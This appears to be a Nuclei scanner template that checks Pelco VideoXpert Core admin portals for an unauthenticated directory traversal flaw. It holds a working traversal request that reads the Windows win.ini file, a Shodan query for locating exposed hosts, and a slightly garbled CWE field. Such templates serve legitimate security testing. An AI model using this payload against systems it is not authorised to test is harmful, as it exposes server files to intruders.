id: videoxpert-lfi

info:
  name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
  author: 0x_akoko
  severity: high
  description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
  reference:
    - https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22Directory-Traversal.html
  metadata:
    max-request: 1
    shodan-query: title:"VideoXpert"
  tags: schneider,pelco,packetstorm,lfi,videoxpert

http:
  - method: GET
    path:
      - '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'bit app support'
          - 'fonts'
          - 'extensions'
        condition: and

      - type: status
        status:
          - 200